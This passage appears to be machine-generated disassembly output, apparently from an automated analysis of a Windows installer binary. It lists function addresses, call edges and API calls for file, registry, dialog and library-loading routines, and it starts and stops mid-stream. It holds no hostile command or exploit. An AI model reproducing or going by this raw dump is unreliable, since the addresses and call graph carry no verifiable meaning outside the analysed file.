calls 3327->3329 3330 403750 3328->3330 3331 406a57 3329->3331 3330->3243 3331->3328 3331->3330 3332->3249 3333->3251 3335 405f6a 3334->3335 3336 4037e8 CharNextW 3335->3336 3337 405f71 CharNextW 3335->3337 3336->3262 3337->3335 3496 4068ef 3338->3496 3340 403625 3340->3257 3341 40361b 3341->3340 3505 405f37 lstrlenW CharPrevW 3341->3505 3344 405c16 2 API calls 3345 403633 3344->3345 3508 406187 3345->3508 3512 406158 GetFileAttributesW CreateFileW 3348->3512 3350 403113 3377 403120 3350->3377 3513 406668 lstrcpynW 3350->3513 3352 403136 3514 405f83 lstrlenW 3352->3514 3356 403147 GetFileSize 3357 403241 3356->3357 3376 40315e 3356->3376 3519 40302e 3357->3519 3361 403286 GlobalAlloc 3364 40329d 3361->3364 3363 4032de 3365 40302e 32 API calls 3363->3365 3368 406187 2 API calls 3364->3368 3365->3377 3366 403267 3367 4035e2 ReadFile 3366->3367 3369 403272 3367->3369 3371 4032ae CreateFileW 3368->3371 3369->3361 3369->3377 3370 40302e 32 API calls 3370->3376 3372 4032e8 3371->3372 3371->3377 3534 4035f8 SetFilePointer 3372->3534 3374 4032f6 3535 403371 3374->3535 3376->3357 3376->3363 3376->3370 3376->3377 3550 4035e2 3376->3550 3377->3264 3379 406a35 5 API calls 3378->3379 3380 403d2b 3379->3380 3381 403d31 3380->3381 3382 403d43 3380->3382 3612 4065af wsprintfW 3381->3612 3613 406536 3382->3613 3386 403d92 lstrcatW 3387 403d41 3386->3387 3597 403fed 3387->3597 3388 406536 3 API calls 3388->3386 3391 40603f 18 API calls 3392 403dc4 3391->3392 3393 403e58 3392->3393 3395 406536 3 API calls 3392->3395 3394 40603f 18 API calls 3393->3394 3396 403e5e 3394->3396 3402 403df6 3395->3402 3397 403e6e LoadImageW 3396->3397 3398 4066a5 17 API calls 3396->3398 3399 403f14 3397->3399 3400 403e95 RegisterClassW 3397->3400 3398->3397 3404 40140b 2 API calls 3399->3404 3403 403ecb SystemParametersInfoW CreateWindowExW 3400->3403 3433 403f1e 3400->3433 3401 403e17 lstrlenW 3406 403e25 lstrcmpiW 3401->3406 3407 403e4b 3401->3407 3402->3393 3402->3401 3405 405f64 CharNextW 3402->3405 3403->3399 3408 403f1a 3404->3408 3409 403e14 3405->3409 3406->3407 3410 403e35 GetFileAttributesW 3406->3410 3411 405f37 3 API calls 3407->3411 3413 403fed 18 API calls 3408->3413 3408->3433 3409->3401 3412 403e41 3410->3412 3414 403e51 3411->3414 3412->3407 3415 405f83 2 API calls 3412->3415 3416 403f2b 3413->3416 3618 406668 lstrcpynW 3414->3618 3415->3407 3418 403f37 ShowWindow 3416->3418 3419 403fba 3416->3419 3420 4069c5 3 API calls 3418->3420 3605 40579d OleInitialize 3419->3605 3422 403f4f 3420->3422 3424 403f5d GetClassInfoW 3422->3424 3427 4069c5 3 API calls 3422->3427 3423 403fc0 3425 403fc4 3423->3425 3426 403fdc 3423->3426 3429 403f71 GetClassInfoW RegisterClassW 3424->3429 3430 403f87 DialogBoxParamW 3424->3430 3431 40140b 2 API calls 3425->3431 3425->3433 3428 40140b 2 API calls 3426->3428 3427->3424 3428->3433 3429->3430 3432 40140b 2 API calls 3430->3432 3431->3433 3432->3433 3433->3282 3434->3255 3634 406668 lstrcpynW 3435->3634 3437 406050 3635 405fe2 CharNextW CharNextW 3437->3635 3440 403a27 3440->3268 3449 406668 lstrcpynW 3440->3449 3441 4068ef 5 API calls 3447 406066 3441->3447 3442 406097 lstrlenW 3443 4060a2 3442->3443 3442->3447 3444 405f37 3 API calls 3443->3444 3446 4060a7 GetFileAttributesW 3444->3446 3446->3440 3447->3440 3447->3442 3448 405f83 2 API calls 3447->3448 3641 40699e FindFirstFileW 3447->3641 3448->3442 3449->3303 3450->3270 3452 406a35 5 API calls 3451->3452 3453 403a61 lstrcatW 3452->3453 3453->3297 3453->3298 3455 405bea GetLastError 3454->3455 3456 403aa7 3454->3456 3455->3456 3457 405bf9 SetFileSecurityW 3455->3457 3456->3308 3457->3456 3458 405c0f GetLastError 3457->3458 3458->3456 3460 405c2a GetLastError 3459->3460 3461 405c26 3459->3461 3460->3461 3461->3308 3462->3310 3463->3319 3475 4066b2 3464->3475 3465 4068d5 3466 403b0d DeleteFileW 3465->3466 3646 406668 lstrcpynW 3465->3646 3466->3315 3466->3319 3468 4068a3 lstrlenW 3468->3475 3470 406536 3 API calls 3470->3475 3471 4066a5 10 API calls 3471->3468 3472 4067ba GetSystemDirectoryW 3472->3475 3474 4067cd GetWindowsDirectoryW 3474->3475 3475->3465 3475->3468 3475->3470 3475->3471 3475->3472 3475->3474 3476 4066a5 10 API calls 3475->3476 3477 406844 lstrcatW 3475->3477 3478 4068ef 5 API calls 3475->3478 3479 4067fc SHGetSpecialFolderLocation 3475->3479 3644 4065af wsprintfW 3475->3644 3645 406668 lstrcpynW 3475->3645 3476->3475 3477->3475 3478->3475 3479->3475 3480 406814 SHGetPathFromIDListW CoTaskMemFree 3479->3480 3480->3475 3482 40644b 3481->3482 3483 40643c 3481->3483 3482->3319 3647 4062ae 3483->3647 3487 405c8a 3486->3487 3488 405c7e CloseHandle 3486->3488 3487->3319 3488->3487 3492 405cdd 3489->3492 3490 403b89 ExitProcess 3491 405cf1 MessageBoxIndirectW 3491->3490 3492->3490 3492->3491 3494 401389 2 API calls 3493->3494 3495 401420 3494->3495 3495->3275 3502 4068fc 3496->3502 3497 406972 3498 406977 CharPrevW 3497->3498 3501 406998 3497->3501 3498->3497 3499 406965 CharNextW 3499->3497 3499->3502 3500 405f64 CharNextW 3500->3502 3501->3341 3502->3497 3502->3499 3502->3500 3503 406951 CharNextW 3502->3503 3504 406960 CharNextW 3502->3504 3503->3502 3504->3499 3506 405f53 lstrcatW 3505->3506 3507 40362d 3505->3507 3506->3507 3507->3344 3509 406194 GetTickCount GetTempFileNameW 3508->3509 3510 40363e 3509->3510 3511 4061ca 3509->3511 3510->3257 3511->3509 3511->3510 3512->3350 3513->3352 3515 405f91 3514->3515 3516 40313c 3515->3516 3517 405f97 CharPrevW 3515->3517 3518 406668 lstrcpynW 3516->3518 3517->3515 3517->3516 3518->3356 3520 403057 3519->3520 3521 40303f 3519->3521 3523 403067 GetTickCount 3520->3523 3524 40305f 3520->3524 3522 403048 DestroyWindow 3521->3522 3527 40304f 3521->3527 3522->3527 3526 403075 3523->3526 3523->3527 3554 406a71 3524->3554 3528 4030aa CreateDialogParamW ShowWindow 3526->3528 3529 40307d 3526->3529 3527->3361 3527->3377 3553 4035f8 SetFilePointer 3527->3553 3528->3527 3529->3527 3558 403012 3529->3558 3531 40308b wsprintfW 3561 4056ca 3531->3561 3534->3374 3536 403380 SetFilePointer 3535->3536 3537 40339c 3535->3537 3536->3537 3572 403479 GetTickCount 3537->3572 3542 403479 42 API calls 3543 4033d3 3542->3543 3544 40343f ReadFile 3543->3544 3548 4033e2 3543->3548 3549 403439 3543->3549 3544->3549 3546 4061db ReadFile 3546->3548 3548->3546 3548->3549 3587 40620a WriteFile 3548->3587 3549->3377 3551 4061db ReadFile 3550->3551 3552 4035f5 3551->3552 3552->3376 3553->3366 3555 406a8e PeekMessageW 3554->3555 3556 406a84 DispatchMessageW 3555->3556 3557 406a9e 3555->3557 3556->3555 3557->3527 3559 403021 3558->3559 3560 403023 MulDiv 3558->3560 3559->3560 3560->3531 3562 4056e5 3561->3562 3563 4030a8 3561->3563 3564 405701 lstrlenW 3562->3564 3565 4066a5 17 API calls 3562->3565 3563->3527 3566 40572a 3564->3566 3567 40570f lstrlenW 3564->3567 3565->3564 3568 405730 SetWindowTextW 3566->3568 3569 40573d 3566->3569 3567->3563 3570 405721 lstrcatW 3567->3570 3568->3569 3569->3563 3571 405743 SendMessageW SendMessageW SendMessageW 3569->3571 3570->3566 3571->3563 3573 4035d1 3572->3573 3574 4034a7 3572->3574 3575 40302e 32 API calls 3573->3575 3589 4035f8 SetFilePointer 3574->3589 3582 4033a3 3575->3582 3577 4034b2 SetFilePointer 3581 4034d7 3577->3581 3578 4035e2 ReadFile 3578->3581 3580 40302e 32 API calls 3580->3581 3581->3578 3581->3580 3581->3582 3583 40620a WriteFile 3581->3583 3584 4035b2 SetFilePointer 3581->3584 3590 406bb0 3581->3590 3582->3549 3585 4061db ReadFile 3582->3585 3583->3581 3584->3573 3586 4033bc 3585->3586 3586->3542 3586->3549 3588 406228 3587->3588 3588->3548 3589->3577 3591 406bd5 3590->3591 3592 406bdd 3590->3592 3591->3581 3592->3591 3593 406c64 GlobalFree 3592->3593 3594 406c6d GlobalAlloc 3592->3594 3595 406ce4 GlobalAlloc 3592->3595 3596 406cdb GlobalFree 3592->3596 3593->3594 3594->3591 3594->3592 3595->3591 3595->3592 3596->3595 3598 404001 3597->3598 3619 4065af wsprintfW 3598->3619 3600 404072 3620 4040a6 3600->3620 3602 403da2 3602->3391 3603 404077 3603->3602 3604 4066a5 17 API calls 3603->3604 3604->3603 3623 404610 3605->3623 3607 4057e7 3608 404610 SendMessageW 3607->3608 3610 4057f9 CoUninitialize 3608->3610 3609 4057c0 3609->3607 3626 401389 3609->3626 3610->3423 3612->3387 3630 4064d5 3613->3630 3616 403d73 3616->3386 3616->3388 3617 40656a RegQueryValueExW RegCloseKey 3617->3616 3618->3393 3619->3600 3621 4066a5 17 API calls 3620->3621 3622 4040b4 SetWindowTextW 3621->3622 3622->3603 3624 404628 3623->3624 3625 404619 SendMessageW 3623->3625 3624->3609 3625->3624 3628 401390 3626->3628 3627 4013fe 3627->3609 3628->3627 3629 4013cb MulDiv SendMessageW 3628->3629 3629->3628 3631 4064e4 3630->3631 3632 4064e8 3631->3632 3633 4064ed RegOpenKeyExW 3631->3633 3632->3616 3632->3617 3633->3632 3634->3437 3637 406011 3635->3637 3638 405fff 3635->3638 3636 406035 3636->3440 3636->3441 3637->3636 3640 405f64 CharNextW 3637->3640 3638->3637 3639 40600c CharNextW 3638->3639 3639->3636 3640->3637 3642 4069b4 FindClose 3641->3642 3643 4069bf 3641->3643 3642->3643 3643->3447 3644->3475 3645->3475 3646->3466 3648 406304 GetShortPathNameW 3647->3648 3649 4062de 3647->3649 3651 406423 3648->3651 3652 406319 3648->3652 3674 406158 GetFileAttributesW CreateFileW 3649->3674 3651->3482 3652->3651 3654 406321 wsprintfA 3652->3654 3653 4062e8 CloseHandle GetShortPathNameW 3653->3651 3655 4062fc 3653->3655 3656 4066a5 17 API calls 3654->3656 3655->3648 3655->3651 3657 406349 3656->3657 3675 406158 GetFileAttributesW CreateFileW 3657->3675 3659 406356 3659->3651 3660 406365 GetFileSize GlobalAlloc 3659->3660 3661 406387 3660->3661 3662 40641c CloseHandle 3660->3662 3663 4061db ReadFile 3661->3663 3662->3651 3664 40638f 3663->3664 3664->3662 3676 4060bd lstrlenA 3664->3676 3667 4063a6 lstrcpyA 3670 4063c8 3667->3670 3668 4063ba 3669 4060bd 4 API calls 3668->3669 3669->3670 3671 4063ff SetFilePointer 3670->3671 3672 40620a WriteFile 3671->3672 3673 406415 GlobalFree 3672->3673 3673->3662 3674->3653 3675->3659 3677 4060fe lstrlenA 3676->3677 3678 4060d7 lstrcmpiA 3677->3678 3680 406106 3677->3680 3679 4060f5 CharNextA 3678->3679 3678->3680 3679->3677 3680->3667 3680->3668 3681 4015c1 3700 402da6 3681->3700 3684 405fe2 4 API calls 3696 4015d1 3684->3696 3685 401631 3686 401663 3685->3686 3687 401636 3685->3687 3691 401423 24 API calls 3686->3691 3706 401423 3687->3706 3688 405f64 CharNextW 3688->3696 3697 40165b 3691->3697 3693 405c16 2 API calls 3693->3696 3694 405c33 5 API calls 3694->3696 3695 40164a SetCurrentDirectoryW 3695->3697 3696->3685 3696->3688 3696->3693 3696->3694 3698 401617 GetFileAttributesW 3696->3698 3699 405b99 4 API calls 3696->3699 3698->3696 3699->3696 3701 402db2 3700->3701 3702 4066a5 17 API calls 3701->3702 3703 402dd3 3702->3703 3704 4015c8 3703->3704 3705 4068ef 5 API calls 3703->3705 3704->3684 3705->3704 3707 4056ca 24 API calls 3706->3707 3708 401431 3707->3708 3709 406668 lstrcpynW 3708->3709 3709->3695 3710 401941 3711 401943 3710->3711 3712 402da6 17 API calls 3711->3712 3713 401948 3712->3713 3716 405d74 3713->3716 3717 40603f 18 API calls 3716->3717 3718 405d94 3717->3718 3719 405d9c DeleteFileW 3718->3719 3720 405db3 3718->3720 3724 401951 3719->3724 3721 405ed3 3720->3721 3752 406668 lstrcpynW 3720->3752 3721->3724 3728 40699e 2 API calls 3721->3728 3723 405dd9 3725 405dec 3723->3725 3726 405ddf lstrcatW 3723->3726 3727 405f83 2 API calls 3725->3727 3729 405df2 3726->3729 3727->3729 3731 405ef8 3728->3731 3730 405e02 lstrcatW 3729->3730 3732 405e0d lstrlenW FindFirstFileW 3729->3732 3730->3732 3731->3724 3733 405f37 3 API calls 3731->3733 3732->3721 3750 405e2f 3732->3750 3734 405f02 3733->3734 3736 405d2c 5 API calls 3734->3736 3735 405eb6 FindNextFileW 3739 405ecc FindClose 3735->3739 3735->3750 3738 405f0e 3736->3738 3740 405f12 3738->3740 3741 405f28 3738->3741 3739->3721 3740->3724 3744 4056ca 24 API calls 3740->3744 3743 4056ca 24 API calls 3741->3743 3743->3724 3746 405f1f 3744->3746 3745 405d74 60 API calls 3745->3750 3748 406428 36 API calls 3746->3748 3747 4056ca 24 API calls 3747->3735 3748->3724 3749 4056ca 24 API calls 3749->3750 3750->3735 3750->3745 3750->3747 3750->3749 3751 406428 36 API calls 3750->3751 3753 406668 lstrcpynW 3750->3753 3754 405d2c 3750->3754 3751->3750 3752->3723 3753->3750 3762 406133 GetFileAttributesW 3754->3762 3757 405d47 RemoveDirectoryW 3760 405d55 3757->3760 3758 405d4f DeleteFileW 3758->3760 3759 405d59 3759->3750 3760->3759 3761 405d65 SetFileAttributesW 3760->3761 3761->3759 3763 405d38 3762->3763 3764 406145 SetFileAttributesW 3762->3764 3763->3757 3763->3758 3763->3759 3764->3763 3765 401c43 3787 402d84 3765->3787 3767 401c4a 3768 402d84 17 API calls 3767->3768 3769 401c57 3768->3769 3770 402da6 17 API calls 3769->3770 3771 401c6c 3769->3771 3770->3771 3772 401c7c 3771->3772 3773 402da6 17 API calls 3771->3773 3774 401cd3 3772->3774 3775 401c87 3772->3775 3773->3772 3777 402da6 17 API calls 3774->3777 3776 402d84 17 API calls 3775->3776 3779 401c8c 3776->3779 3778 401cd8 3777->3778 3780 402da6 17 API calls 3778->3780 3781 402d84 17 API calls 3779->3781 3782 401ce1 FindWindowExW 3780->3782 3783 401c98 3781->3783 3786 401d03 3782->3786 3784 401cc3 SendMessageW 3783->3784 3785 401ca5 SendMessageTimeoutW 3783->3785 3784->3786 3785->3786 3788 4066a5 17 API calls 3787->3788 3789 402d99 3788->3789 3789->3767 4269 4028c4 4270 4028ca 4269->4270 4271 4028d2 FindClose 4270->4271 4272 402c2a 4270->4272 4271->4272 3869 4040c5 3870 4040dd 3869->3870 3871 40423e 3869->3871 3870->3871 3872 4040e9 3870->3872 3873 40424f GetDlgItem GetDlgItem 3871->3873 3878 40428f 3871->3878 3875 4040f4 SetWindowPos 3872->3875 3876 404107 3872->3876 3877 4045c4 18 API calls 3873->3877 3874 4042e9 3879 404610 SendMessageW 3874->3879 3887 404239 3874->3887 3875->3876 3880 404110 ShowWindow 3876->3880 3881 404152 3876->3881 3882 404279 SetClassLongW 3877->3882 3878->3874 3886 401389 2 API calls 3878->3886 3909 4042fb 3879->3909 3888 404130 GetWindowLongW 3880->3888 3889 4041fc 3880->3889 3883 404171 3881->3883 3884 40415a DestroyWindow 3881->3884 3885 40140b 2 API calls 3882->3885 3891 404176 SetWindowLongW 3883->3891 3892 404187 3883->3892 3890 40454d 3884->3890 3885->3878 3893 4042c1 3886->3893 3888->3889 3895 404149 ShowWindow 3888->3895 3894 40462b 8 API calls 3889->3894 3890->3887 3902 40457e ShowWindow 3890->3902 3891->3887 3892->3889 3896 404193 GetDlgItem 3892->3896 3893->3874 3897 4042c5 SendMessageW 3893->3897 3894->3887 3895->3881 3900 4041c1 3896->3900 3901 4041a4 SendMessageW IsWindowEnabled 3896->3901 3897->3887 3898 40140b 2 API calls 3898->3909 3899 40454f DestroyWindow KiUserCallbackDispatcher 3899->3890 3904 4041ce 3900->3904 3907 404215 SendMessageW 3900->3907 3908 4041e1 3900->3908 3914 4041c6 3900->3914 3901->3887 3901->3900 3902->3887 3903 4066a5 17 API calls 3903->3909 3904->3907 3904->3914 3906 4045c4 18 API calls 3906->3909 3907->3889 3910 4041e9 3908->3910 3911 4041fe 3908->3911 3909->3887 3909->3898 3909->3899 3909->3903 3909->3906 3915 4045c4 18 API calls 3909->3915 3931 40448f DestroyWindow 3909->3931 3913 40140b 2 API calls 3910->3913 3912 40140b 2 API calls 3911->3912 3912->3914 3913->3914 3914->3889 3943 40459d 3914->3943 3916 404376 GetDlgItem 3915->3916 3917 404393 ShowWindow KiUserCallbackDispatcher 3916->3917 3918 40438b 3916->3918 3940 4045e6 KiUserCallbackDispatcher 3917->3940 3918->3917 3920 4043bd KiUserCallbackDispatcher 3925 4043d1 3920->3925 3921 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3922 404406 SendMessageW 3921->3922 3921->3925 3922->3925 3924 4040a6 18 API calls 3924->3925 3925->3921 3925->3924 3941 4045f9 SendMessageW 3925->3941 3942 406668 lstrcpynW 3925->3942 3927 404435 lstrlenW 3928 4066a5 17 API calls 3927->3928 3929 40444b SetWindowTextW 3928->3929 3930 401389 2 API calls 3929->3930 3930->3909 3931->3890 3932 4044a9 CreateDialogParamW 3931->3932 3932->3890 3933 4044dc 3932->3933 3934 4045c4 18 API calls 3933->3934 3935 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3934->3935 3936 401389 2 API calls 3935->3936 3937 40452d 3936->3937 3937->3887 3938 404535 ShowWindow 3937->3938 3939 404610 SendMessageW 3938->3939 3939->3890 3940->3920 3941->3925 3942->3927 3944 4045a4 3943->3944 3945 4045aa SendMessageW 3943->3945 3944->3945 3945->3889 4276 4016cc 4277 402da6 17 API calls 4276->4277 4278 4016d2 GetFullPathNameW 4277->4278 4279 4016ec 4278->4279 4285 40170e 4278->4285 4281 40699e 2 API calls 4279->4281 4279->4285 4280 401723 GetShortPathNameW 4282 402c2a 4280->4282 4283 4016fe 4281->4283 4283->4285 4286 406668 lstrcpynW 4283->4286 4285->4280 4285->4282 4286->4285 4287 401e4e GetDC 4288 402d84 17 API calls 4287->4288 4289 401e60 GetDeviceCaps MulDiv ReleaseDC 4288->4289 4290 402d84 17 API calls 4289->4290 4291 401e91 4290->4291 4292 4066a5 17 API calls 4291->4292 4293 401ece CreateFontIndirectW 4292->4293 4294 402638 4293->4294 4294->4294 4069 402950 4070 402da6 17 API calls 4069->4070 4072 40295c 4070->4072 4071 402972 4074 406133 2 API calls 4071->4074 4072->4071 4073 402da6 17 API calls 4072->4073 4073->4071 4075 402978 4074->4075 4097 406158 GetFileAttributesW CreateFileW 4075->4097 4077 402985 4078 402a3b 4077->4078 4079 4029a0 GlobalAlloc 4077->4079 4080 402a23 4077->4080 4081 402a42 DeleteFileW 4078->4081 4082 402a55 4078->4082 4079->4080 4083 4029b9 4079->4083 4084 403371 44 API calls 4080->4084 4081->4082 4098 4035f8 SetFilePointer 4083->4098 4086 402a30 CloseHandle 4084->4086 4086->4078 4087 4029bf 4088 4035e2 ReadFile 4087->4088 4089 4029c8 GlobalAlloc 4088->4089 4090 4029d8 4089->4090 4091 402a0c 4089->4091 4092 403371 44 API calls 4090->4092 4093 40620a WriteFile 4091->4093 4096 4029e5 4092->4096 4094 402a18 GlobalFree 4093->4094 4094->4080 4095 402a03 GlobalFree 4095->4091 4096->4095 4097->4077 4098->4087 4302 403cd5 4303 403ce0 4302->4303 4304 403ce4 4303->4304 4305 403ce7 GlobalAlloc 4303->4305 4305->4304 4306 401956 4307 402da6 17 API calls 4306->4307 4308 40195d lstrlenW 4307->4308 4309 402638 4308->4309 4310 4014d7 4311 402d84 17 API calls 4310->4311 4312 4014dd Sleep 4311->4312 4314 402c2a 4312->4314 4199 4020d8 4200 4020ea 4199->4200 4210 40219c 4199->4210 4201 402da6 17 API calls 4200->4201 4202 4020f1 4201->4202 4204 402da6 17 API calls 4202->4204 4203 401423 24 API calls 4206 4022f6 4203->4206 4205 4020fa 4204->4205 4207 402110 LoadLibraryExW 4205->4207 4208 402102 GetModuleHandleW 4205->4208 4209 402121 4207->4209 4207->4210 4208->4207 4208->4209 4219 406aa4 4209->4219 4210->4203 4213 402132 4216 401423 24 API calls 4213->4216 4217 402142 4213->4217 4214 40216b 4215 4056ca 24 API calls 4214->4215 4215->4217 4216->4217 4217->4206 4218 40218e FreeLibrary 4217->4218 4218->4206 4224 40668a WideCharToMultiByte 4219->4224 4221 406ac1 4222 406ac8 GetProcAddress 4221->4222 4223 40212c 4221->4223 4222->4223 4223->4213 4223->4214 4224->4221 4315 402b59 4316 402b60 4315->4316 4317 402bab 4315->4317 4319 402ba9 4316->4319 4321 402d84 17 API calls 4316->4321 4318 406a35 5 API calls 4317->4318 4320 402bb2 4318->4320 4322 402da6 17 API calls 4320->4322 4323 402b6e 4321->4323 4324 402bbb 4322->4324 4325 402d84 17 API calls 4323->4325 4324->4319 4326 402bbf IIDFromString 4324->4326 4328 402b7a 4325->4328 4326->4319 4327 402bce 4326->4327 4327->4319 4333 406668 lstrcpynW 4327->4333 4332 4065af wsprintfW 4328->4332 4331 402beb CoTaskMemFree 4331->4319 4332->4319 4333->4331 4334 402a5b 4335 402d84 17 API calls 4334->4335 4336 402a61 4335->4336 4337 402aa4 4336->4337 4338 402a88 4336->4338 4343 40292e 4336->4343 4340 402abe 4337->4340 4341 402aae 4337->4341 4339 402a8d 4338->4339 4347 402a9e 4338->4347 4348 406668 lstrcpynW 4339->4348 4342 4066a5 17 API calls 4340->4342 4344 402d84 17 API calls 4341->4344 4342->4347 4344->4347 4347->4343 4349 4065af wsprintfW 4347->4349 4348->4343 4349->4343 4248 40175c 4249 402da6 17 API calls 4248->4249 4250 401763 4249->4250 4251 406187 2 API calls 4250->4251 4252 40176a 4251->4252 4253 406187 2 API calls 4252->4253 4253->4252 4350 401d5d 4351 402d84 17 API calls 4350->4351 4352 401d6e SetWindowLongW 4351->4352 4353 402c2a 4352->4353 4254 401ede 4255 402d84 17 API calls 4254->4255 4256 401ee4 4255->4256 4257 402d84 17 API calls 4256->4257 4258 401ef0 4257->4258 4259 401f07 EnableWindow 4258->4259 4260 401efc ShowWindow 4258->4260 4261 402c2a 4259->4261 4260->4261 4354 4028de 4355 4028e6 4354->4355 4356 4028ea FindNextFileW 4355->4356 4359 4028fc 4355->4359 4357 402943 4356->4357 4356->4359 4360 406668 lstrcpynW 4357->4360 4360->4359 4361 406d5f 4367 406be3 4361->4367 4362 40754e 4363 406c64 GlobalFree 4364 406c6d GlobalAlloc 4363->4364 4364->4362 4364->4367 4365 406ce4 GlobalAlloc 4365->4362 4365->4367 4366 406cdb GlobalFree 4366->4365 4367->4362 4367->4363 4367->4364 4367->4365 4367->4366 4368 401563 4369 402ba4 4368->4369 4372 4065af wsprintfW 4369->4372 4371 402ba9 4372->4371 4373 401968 4374 402d84 17 API calls 4373->4374 4375 40196f 4374->4375 4376 402d84 17 API calls 4375->4376 4377 40197c 4376->4377 4378 402da6 17 API calls 4377->4378 4379 401993 lstrlenW 4378->4379 4381 4019a4 4379->4381 4380 4019e5 4381->4380 4385 406668 lstrcpynW 4381->4385 4383 4019d5 4383->4380 4384 4019da lstrlenW 4383->4384 4384->4380 4385->4383 4393 40166a 4394 402da6 17 API calls 4393->4394 4395 401670 4394->4395 4396 40699e 2 API calls 4395->4396 4397 401676 4396->4397 4398 402aeb 4399 402d84 17 API calls 4398->4399 4400 402af1 4399->4400 4401 4066a5 17 API calls 4400->4401 4402 40292e 4400->4402 4401->4402 4403 4026ec 4404 402d84 17 API calls 4403->4404 4410 4026fb 4404->4410 4405 402745 ReadFile 4405->4410 4412 402838 4405->4412 4406 4061db ReadFile 4406->4410 4407 402785 MultiByteToWideChar 4407->4410 4408 40283a 4425 4065af wsprintfW 4408->4425 4410->4405 4410->4406 4410->4407 4410->4408 4410->4412 4413 4027ab SetFilePointer MultiByteToWideChar 4410->4413 4414 40284b 4410->4414 4416 406239 SetFilePointer 4410->4416 4413->4410 4414->4412 4415 40286c SetFilePointer 4414->4415 4415->4412 4417 406255 4416->4417 4420 40626d 4416->4420 4418 4061db ReadFile 4417->4418 4419 406261 4418->4419 4419->4420 4421 406276 SetFilePointer 4419->4421 4422 40629e SetFilePointer 4419->4422 4420->4410 4421->4422 4423 406281 4421->4423 4422->4420 4424 40620a WriteFile 4423->4424 4424->4420 4425->4412 4426 404a6e 4427 404aa4 4426->4427 4428 404a7e 4426->4428 4430 40462b 8 API calls 4427->4430 4429 4045c4 18 API calls 4428->4429 4431 404a8b SetDlgItemTextW 4429->4431 4432 404ab0 4430->4432 4431->4427 4028 40176f 4029 402da6 17 API calls 4028->4029 4030 401776 4029->4030 4031 401796 4030->4031 4032 40179e 4030->4032 4067 406668 lstrcpynW 4031->4067 4068 406668 lstrcpynW 4032->4068 4035 40179c 4039 4068ef 5 API calls 4035->4039 4036 4017a9 4037 405f37 3 API calls 4036->4037 4038 4017af lstrcatW 4037->4038 4038->4035 4059 4017bb 4039->4059 4040 40699e 2 API calls 4040->4059 4041 406133 2 API calls 4041->4059 4043 4017cd CompareFileTime 4043->4059 4044 40188d 4046 4056ca 24 API calls 4044->4046 4045 401864 4047 4056ca 24 API calls 4045->4047 4055 401879 4045->4055 4048 401897 4046->4048 4047->4055 4049 403371 44 API calls 4048->4049 4050 4018aa 4049->4050 4051 4018be SetFileTime 4050->4051 4052 4018d0 CloseHandle 4050->4052 4051->4052 4054 4018e1 4052->4054 4052->4055 4053 4066a5 17 API calls 4053->4059 4057 4018e6 4054->4057 4058 4018f9 4054->4058 4056 406668 lstrcpynW 4056->4059 4060 4066a5 17 API calls 4057->4060 4061 4066a5 17 API calls 4058->4061 4059->4040 4059->4041 4059->4043 4059->4044 4059->4045 4059->4053 4059->4056 4062 405cc8 MessageBoxIndirectW 4059->4062 4066 406158 GetFileAttributesW CreateFileW 4059->4066 4063 4018ee lstrcatW 4060->4063 4064 401901 4061->4064 4062->4059 4063->4064 4065 405cc8 MessageBoxIndirectW 4064->4065 4065->4055 4066->4059 4067->4035 4068->4036 4433 401a72 4434 402d84 17 API calls 4433->4434 4435 401a7b 4434->4435 4436 402d84 17 API calls 4435->4436 4437 401a20 4436->4437 4438 401573 4439 401583 ShowWindow 4438->4439 4440 40158c 4438->4440 4439->4440 4441 402c2a 4440->4441 4442 40159a ShowWindow 4440->4442 4442->4441 4109 4023f4 4110 402da6 17 API calls 4109->4110 4111 402403 4110->4111 4112 402da6 17 API calls 4111->4112 4113 40240c 4112->4113 4114 402da6 17 API calls 4113->4114 4115 402416 GetPrivateProfileStringW 4114->4115 4443 4014f5 SetForegroundWindow 4444 402c2a 4443->4444 4445 401ff6 4446 402da6 17 API calls 4445->4446 4447 401ffd 4446->4447 4448 40699e 2 API calls 4447->4448 4449 402003 4448->4449 4450 402014 4449->4450 4452 4065af wsprintfW 4449->4452 4452->4450 4453 401b77 4454 402da6 17 API calls 4453->4454 4455 401b7e 4454->4455 4456 402d84 17 API calls 4455->4456 4457 401b87 wsprintfW 4456->4457 4458 402c2a 4457->4458 4459 4046fa lstrcpynW lstrlenW 4460 40167b 4461 402da6 17 API calls 4460->4461 4462 401682 4461->4462 4463 402da6 17 API calls 4462->4463 4464 40168b 4463->4464 4465 402da6 17 API calls 4464->4465 4466 401694 MoveFileW 4465->4466 4467 4016a0 4466->4467 4468 4016a7 4466->4468 4470 401423 24 API calls 4467->4470 4469 40699e 2 API calls 4468->4469 4472 4022f6 4468->4472 4471 4016b6 4469->4471 4470->4472 4471->4472 4473 406428 36 API calls 4471->4473 4473->4467 4481 4019ff 4482 402da6 17 API calls 4481->4482 4483 401a06 4482->4483 4484 402da6 17 API calls 4483->4484 4485 401a0f 4484->4485 4486 401a16 lstrcmpiW 4485->4486 4487 401a28 lstrcmpW 4485->4487 4488 401a1c 4486->4488 4487->4488 4489 4022ff 4490 402da6 17 API calls 4489->4490 4491 402305 4490->4491 4492 402da6 17 API calls 4491->4492 4493 40230e 4492->4493 4494 402da6 17 API calls 4493->4494 4495 402317 4494->4495 4496 40699e 2 API calls 4495->4496 4497 402320 4496->4497 4498 402331 lstrlenW lstrlenW 4497->4498 4502 402324 4497->4502 4500 4056ca 24 API calls 4498->4500 4499 4056ca 24 API calls 4503 40232c 4499->4503 4501 40236f SHFileOperationW 4500->4501 4501->4502 4501->4503 4502->4499 4502->4503 4504 401000 4505 401037 BeginPaint GetClientRect 4504->4505 4506 40100c DefWindowProcW 4504->4506 4508 4010f3 4505->4508 4509 401179 4506->4509 4510 401073 CreateBrushIndirect FillRect DeleteObject 4508->4510 4511 4010fc 4508->4511 4510->4508 4512 401102 CreateFontIndirectW 4511->4512 4513 401167 EndPaint 4511->4513 4512->4513 4514 401112 6 API calls 4512->4514 4513->4509 4514->4513 4515 401d81 4516 401d94 GetDlgItem 4515->4516 4517 401d87 4515->4517 4519 401d8e 4516->4519 4518 402d84 17 API calls 4517->4518 4518->4519 4520 401dd5 GetClientRect LoadImageW SendMessageW 4519->4520 4521 402da6 17 API calls 4519->4521 4523 401e33 4520->4523 4525 401e3f 4520->4525 4521->4520 4524 401e38 DeleteObject 4523->4524 4523->4525 4524->4525 3790 404783 3791 40479b 3790->3791 3795 4048b5 3790->3795 3821 4045c4 3791->3821 3792 40491f 3793 4049e9 3792->3793 3794 404929 GetDlgItem 3792->3794 3833 